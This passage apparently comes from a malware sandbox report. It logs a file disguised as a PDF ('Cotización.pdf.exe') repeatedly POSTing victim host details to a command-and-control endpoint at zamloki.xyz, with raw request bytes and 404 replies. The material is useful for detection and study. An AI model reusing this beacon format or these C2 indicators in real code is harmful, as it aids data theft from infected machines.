                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lIMHcxnyr2Smhf%2FBkNW2T851Nos%2Bg4pgsZJHah6d%2Bfpnup%2BKnJHZXvAmR%2FC3ZSvcW3JzpoEGOmpOn%2FTTA6TMopI8iI1MKcqnpRA43T7JamSakb1MSN73P5qql3Hg4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255063e9f3c2fe-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    134192.168.2.349873172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:06.223687887 CEST5732OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:06.246424913 CEST5732OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:06.496643066 CEST5733INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3zYjTwGTEFBWsXOkZ1WG6cI7CXWmSZdp9co9eOIEaBBjQNIxVVDmWjwCvGYRq8iD9cdunWqrZuG%2FffNqNPctzzsDdwL9AHQTfiKD%2Fk4%2F1vNozEc3T%2F5iJY8Ha1hzBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255067fc704eb0-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    135192.168.2.349874104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:06.779618979 CEST5734OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:06.801768064 CEST5734OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:07.053307056 CEST5735INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WIuUT%2BR5cEe8GExOX1nSpHMIf5qrSNVnLsGQm%2FVMazOraKshXHwD8S%2BbMIkJahk1BTdlubD2m1lmfldW%2F1vLewtb294h95AJhalr9bMOwFpjsvRf1JxrNkCMJIg8Og%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725506b7d874e4a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    136192.168.2.349875172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:03:07.265630007 CEST5736OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:07.283562899 CEST5736OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:07.538237095 CEST5737INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yB8PuiIFqfcuR%2BJsoMnjhbvwRHJyO0w2GNkuwNnAgjN4n1nj8I380iZOKAVk0TQ%2FnHLxzBqhOQRZRfyvNPIaLVNsImRGwEVTG5tJ1%2F8UjTxLjIAZzDs2J%2B%2B4eTnmiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725506e7ef92b1a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    14192.168.2.349743172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:55.876569986 CEST1318OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:55.896106005 CEST1319OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:56.145951986 CEST1321INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vUK28H8B4nsoIp2oF8TemiZ%2FUQalqqPlceRoWSnA115jxnVeHgzqm%2Bx0U5m7%2BxM3kVgDEtb3EzYNm%2B%2FED5Y506dnxwxziq853YUFVVa9Z4BITaYahbvp70xv0oP%2B7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eb04f92061c-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    15192.168.2.349744104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:56.388957024 CEST1324OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:56.410024881 CEST1324OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:56.682169914 CEST1325INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6O4NsK3Iqt1Unh9Djs8UesYO8fvWkkQd0ADAnyGRMl%2FPvMii5paX6c0ijDqD0FIqHPwqMtA6vDfk3A5EU%2BsPOXqB4A3dQmQkQb0v7pnRmURilTejshbNfUltm3LxkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eb37e8b16e6-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    16192.168.2.349745172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:57.155353069 CEST1329OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:57.175076008 CEST1329OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:57.438842058 CEST1331INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T647JiPYGB%2F%2BHRuP27dXZKJRfBTGvihhCZCCKLqUMbXIic4wyZcvjil%2BL8fbv9i%2FNV39%2FGAS%2Bvju1Uuz6cCpTYF5G%2FPaX5b0vAIu8zjeDjbu963zZ%2FikjIhudUylcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eb84eab2bd6-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    17192.168.2.349746104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:58.602627039 CEST1334OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:58.620218039 CEST1334OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:58.904438019 CEST1335INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=47ZIMOo2ZO4vl423ar4RIA%2Bf4%2FpyreoB3WLINd6lwVvc490AQt08On30IxjTdSXUUZ8GSdub9S0wcGXHkjXmTac3qc4OLM8T9b9NBmLz6KkhH0N3DHyk4F3SeGhdMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ec1581d0629-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    18192.168.2.349747104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:59.188102007 CEST1336OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:59.208123922 CEST1336OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:59.472018957 CEST1337INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TTpTsBYYJCkSdOBzPUVhIxIXv%2BSVZPCBTFinYySm11qXwermTb3crTOxpEQYPzD1IwGAGusRmqxPtkRRHMf%2FnmwF2VcVkxPu8YyozZx%2BhPrX2K6d8ejC8dsWmr27aA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ec509f10ea7-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    19192.168.2.349748104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:59.766561031 CEST1338OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:59.784653902 CEST1338OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:00.032890081 CEST1339INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mp4sLaDhC0kov%2Fooz3IupxggGLBJIzvBBdRRMo9kd1Vy4TOxKOH9KJGJ312%2Fhhtq05xy0xqqZsKzE8NHGJ2IgyOC5kcFsQ5sZ%2FUfJu9ZfkBk61ikoJQ1dAlDRf3%2Faw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ec89db34eb5-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.349729104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:48.941817999 CEST1278OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:48.960004091 CEST1279OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:49.239253998 CEST1279INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EWGG%2BGP6oVjEsgDPPR1o%2B%2F7KQCoLSaprAnIZnr5qDS9oI3zmb6ho6ohPWN22gultOs9Bbp4mgfYnhL9g3D4Ei43zy6%2BNNrsVOXzNOjCwyVz9rm8OrIbuSeSz%2FAEWMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e84ff084ece-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    20192.168.2.349749172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:00.294747114 CEST1340OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:00.314498901 CEST1340OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:00.733241081 CEST1341INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GwE5bed%2BzDBqHZvf8lCo%2F%2FyImBA7ROWCyVWU3L7Jpu7o%2FMsloQDe7zSHU%2Fv%2B3rgh4iJGvG%2BGYntsXGU2eUCFz%2F0dJTDc2ucU3b8bRfO4JoFDdo5u7%2Bzll63itnO1pQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ecbec33dfcf-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    21192.168.2.349750104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:01.036137104 CEST1342OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:01.055702925 CEST1342OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:01.287220955 CEST1343INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BsCAm%2FzfpGe1orNMKQm0mvn1rR8L2Z3Kecu%2Fz2z7Ps%2BixU%2Bx3yuV8OrVSlVNbgVU5Vgjn%2FWkztBxJjrMqH%2B07QXTTPtKKLswSamA7A%2FIqXLICzhMO7MUcLSyw355Nw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ed0885b4e2b-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    22192.168.2.349751172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:01.574631929 CEST1343OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:01.594624996 CEST1344OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:01.856180906 CEST1344INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RWGdBTE98Ev8d7nij%2FjMEd6Vm0SEIbYvTmpeLdlEd63kPeS9YFepsFSYC9iIpCUWxf5Yo388MyBPhGwpaeJE1GT%2Fr4uzN566RgUylixXqFL4p96e9VSbkvNhc%2B8zdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ed3ed86177a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    23192.168.2.349752172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:02.144804001 CEST1345OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
